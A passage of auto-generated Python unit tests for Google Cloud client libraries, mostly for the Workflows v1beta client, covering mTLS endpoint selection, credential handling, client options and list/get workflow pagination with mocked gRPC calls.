(DashboardsServiceClient, transports.DashboardsServiceGrpcTransport),
(
DashboardsServiceAsyncClient,
transports.DashboardsServiceGrpcAsyncIOTransport,
),
],
)
def test_api_key_credentials(client_class, transport_class):
with mock.patch.object(
google.auth._default, "get_api_key_credentials", create=True
) as get_api_key_credentials:
mock_cred = mock.Mock()
get_api_key_credentials.return_value = mock_cred
options = client_options.ClientOptions()
options.api_key = "api_key"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=mock_cred,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
| googleapis/python-monitoring-dashboards | tests/unit/gapic/dashboard_v1/test_dashboards_service.py | Python | apache-2.0 | 83,643 | [
"Octopus"
] | 05ee69ab6f4929b010e4fb625f5dae4a368d2abe056bb906c22ece23aeb37180 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import future
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation
from google.api_core import operation_async # type: ignore
from google.api_core import operations_v1
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.workflows_v1beta.services.workflows import WorkflowsAsyncClient
from google.cloud.workflows_v1beta.services.workflows import WorkflowsClient
from google.cloud.workflows_v1beta.services.workflows import pagers
from google.cloud.workflows_v1beta.services.workflows import transports
from google.cloud.workflows_v1beta.types import workflows
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert WorkflowsClient._get_default_mtls_endpoint(None) is None
assert WorkflowsClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert (
WorkflowsClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
WorkflowsClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
WorkflowsClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert WorkflowsClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [WorkflowsClient, WorkflowsAsyncClient,])
def test_workflows_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "workflows.googleapis.com:443"
@pytest.mark.parametrize(
"transport_class,transport_name",
[
(transports.WorkflowsGrpcTransport, "grpc"),
(transports.WorkflowsGrpcAsyncIOTransport, "grpc_asyncio"),
],
)
def test_workflows_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [WorkflowsClient, WorkflowsAsyncClient,])
def test_workflows_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "workflows.googleapis.com:443"
def test_workflows_client_get_transport_class():
transport = WorkflowsClient.get_transport_class()
available_transports = [
transports.WorkflowsGrpcTransport,
]
assert transport in available_transports
transport = WorkflowsClient.get_transport_class("grpc")
assert transport == transports.WorkflowsGrpcTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc"),
(
WorkflowsAsyncClient,
transports.WorkflowsGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
@mock.patch.object(
WorkflowsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkflowsClient)
)
@mock.patch.object(
WorkflowsAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(WorkflowsAsyncClient),
)
def test_workflows_client_client_options(client_class, transport_class, transport_name):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(WorkflowsClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(WorkflowsClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class(transport=transport_name)
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class(transport=transport_name)
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc", "true"),
(
WorkflowsAsyncClient,
transports.WorkflowsGrpcAsyncIOTransport,
"grpc_asyncio",
"true",
),
(WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc", "false"),
(
WorkflowsAsyncClient,
transports.WorkflowsGrpcAsyncIOTransport,
"grpc_asyncio",
"false",
),
],
)
@mock.patch.object(
WorkflowsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkflowsClient)
)
@mock.patch.object(
WorkflowsAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(WorkflowsAsyncClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_workflows_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class", [WorkflowsClient, WorkflowsAsyncClient])
@mock.patch.object(
WorkflowsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkflowsClient)
)
@mock.patch.object(
WorkflowsAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(WorkflowsAsyncClient),
)
def test_workflows_client_get_mtls_endpoint_and_cert_source(client_class):
mock_client_cert_source = mock.Mock()
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source == mock_client_cert_source
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
mock_client_cert_source = mock.Mock()
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=mock_client_cert_source,
):
(
api_endpoint,
cert_source,
) = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc"),
(
WorkflowsAsyncClient,
transports.WorkflowsGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_workflows_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc", grpc_helpers),
(
WorkflowsAsyncClient,
transports.WorkflowsGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_workflows_client_client_options_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_workflows_client_client_options_from_dict():
with mock.patch(
"google.cloud.workflows_v1beta.services.workflows.transports.WorkflowsGrpcTransport.__init__"
) as grpc_transport:
grpc_transport.return_value = None
client = WorkflowsClient(client_options={"api_endpoint": "squid.clam.whelk"})
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc", grpc_helpers),
(
WorkflowsAsyncClient,
transports.WorkflowsGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_workflows_client_create_channel_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# test that the credentials from file are saved and used as the credentials.
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel"
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
file_creds = ga_credentials.AnonymousCredentials()
load_creds.return_value = (file_creds, None)
adc.return_value = (creds, None)
client = client_class(client_options=options, transport=transport_name)
create_channel.assert_called_with(
"workflows.googleapis.com:443",
credentials=file_creds,
credentials_file=None,
quota_project_id=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=None,
default_host="workflows.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("request_type", [workflows.ListWorkflowsRequest, dict,])
def test_list_workflows(request_type, transport: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.ListWorkflowsResponse(
next_page_token="next_page_token_value", unreachable=["unreachable_value"],
)
response = client.list_workflows(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.ListWorkflowsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkflowsPager)
assert response.next_page_token == "next_page_token_value"
assert response.unreachable == ["unreachable_value"]
def test_list_workflows_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
client.list_workflows()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.ListWorkflowsRequest()
@pytest.mark.asyncio
async def test_list_workflows_async(
transport: str = "grpc_asyncio", request_type=workflows.ListWorkflowsRequest
):
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
workflows.ListWorkflowsResponse(
next_page_token="next_page_token_value",
unreachable=["unreachable_value"],
)
)
response = await client.list_workflows(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.ListWorkflowsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkflowsAsyncPager)
assert response.next_page_token == "next_page_token_value"
assert response.unreachable == ["unreachable_value"]
@pytest.mark.asyncio
async def test_list_workflows_async_from_dict():
await test_list_workflows_async(request_type=dict)
def test_list_workflows_field_headers():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.ListWorkflowsRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
call.return_value = workflows.ListWorkflowsResponse()
client.list_workflows(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_workflows_field_headers_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.ListWorkflowsRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
workflows.ListWorkflowsResponse()
)
await client.list_workflows(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_workflows_flattened():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.ListWorkflowsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_workflows(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_workflows_flattened_error():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_workflows(
workflows.ListWorkflowsRequest(), parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_workflows_flattened_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.ListWorkflowsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
workflows.ListWorkflowsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_workflows(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_workflows_flattened_error_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_workflows(
workflows.ListWorkflowsRequest(), parent="parent_value",
)
def test_list_workflows_pager(transport_name: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
workflows.ListWorkflowsResponse(
workflows=[
workflows.Workflow(),
workflows.Workflow(),
workflows.Workflow(),
],
next_page_token="abc",
),
workflows.ListWorkflowsResponse(workflows=[], next_page_token="def",),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(),], next_page_token="ghi",
),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(), workflows.Workflow(),],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_workflows(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, workflows.Workflow) for i in results)
def test_list_workflows_pages(transport_name: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
workflows.ListWorkflowsResponse(
workflows=[
workflows.Workflow(),
workflows.Workflow(),
workflows.Workflow(),
],
next_page_token="abc",
),
workflows.ListWorkflowsResponse(workflows=[], next_page_token="def",),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(),], next_page_token="ghi",
),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(), workflows.Workflow(),],
),
RuntimeError,
)
pages = list(client.list_workflows(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_workflows_async_pager():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workflows), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
workflows.ListWorkflowsResponse(
workflows=[
workflows.Workflow(),
workflows.Workflow(),
workflows.Workflow(),
],
next_page_token="abc",
),
workflows.ListWorkflowsResponse(workflows=[], next_page_token="def",),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(),], next_page_token="ghi",
),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(), workflows.Workflow(),],
),
RuntimeError,
)
async_pager = await client.list_workflows(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, workflows.Workflow) for i in responses)
@pytest.mark.asyncio
async def test_list_workflows_async_pages():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workflows), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
workflows.ListWorkflowsResponse(
workflows=[
workflows.Workflow(),
workflows.Workflow(),
workflows.Workflow(),
],
next_page_token="abc",
),
workflows.ListWorkflowsResponse(workflows=[], next_page_token="def",),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(),], next_page_token="ghi",
),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(), workflows.Workflow(),],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_workflows(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [workflows.GetWorkflowRequest, dict,])
def test_get_workflow(request_type, transport: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.Workflow(
name="name_value",
description="description_value",
state=workflows.Workflow.State.ACTIVE,
revision_id="revision_id_value",
service_account="service_account_value",
source_contents="source_contents_value",
)
response = client.get_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.GetWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workflows.Workflow)
assert response.name == "name_value"
assert response.description == "description_value"
assert response.state == workflows.Workflow.State.ACTIVE
assert response.revision_id == "revision_id_value"
assert response.service_account == "service_account_value"
def test_get_workflow_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
client.get_workflow()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.GetWorkflowRequest()
@pytest.mark.asyncio
async def test_get_workflow_async(
transport: str = "grpc_asyncio", request_type=workflows.GetWorkflowRequest
):
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
